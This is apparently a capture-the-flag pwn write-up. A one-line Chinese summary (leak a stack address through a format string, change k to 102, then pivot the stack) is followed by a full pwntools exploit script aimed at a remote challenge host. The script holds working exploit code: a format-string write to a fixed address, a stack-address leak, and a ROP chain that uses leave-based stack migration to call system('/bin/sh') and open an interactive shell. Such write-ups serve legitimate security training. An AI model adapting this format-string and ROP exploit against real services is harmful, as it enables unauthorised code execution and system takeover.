通过格式化字符串泄露栈地址,并将k改为102,最后进行栈迁移即可
from struct import *
from ctypes import *
def dbg():
gdb.attach(io,'b *0x40073e')
pause()
def s(a):
io.send(a)
def sl(a):
io.sendline(a)
def sa(a,b):
io.sendafter(a, b)
def sla(a,b):
io.sendlineafter(a, b)
def r():
io.recv()
def rl():
io.recvline()
def ru(a):
io.recvuntil(a)
def get_addr():
return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
debug = 1
if debug == 0:
io = process('./pwn')
if debug == 1:
io = remote('node5.anna.nssctf.cn', 28241)
#context(os = 'linux', arch = 'amd64', log_level = 'debug')
elf = ELF('./pwn')
#libc = ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so')
c = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
#--------------------------------------------------------------------
key = 0x6010A0
rdi = 0x0400893
ret = 0x0400581
leave = 0x0400758
#dbg()
payload = b'%32$p' + b'%'+ str(102-14).encode() + b'c%8$hhna' + p64(key)
sl(payload)
ru(b',')
stack = int(io.recvuntil(b' ',drop = True),16)
shell = stack - 0x30
payload = b'/bin/sh\x00' + p64(ret) + p64(rdi) + p64(shell) + p64(elf.plt['system'])
payload = payload.ljust(0x30,b'a') + p64(shell) + p64(leave)
sl(payload)
sla('?', b'dijia')
print("stack :"+hex(shell))
io.interactive()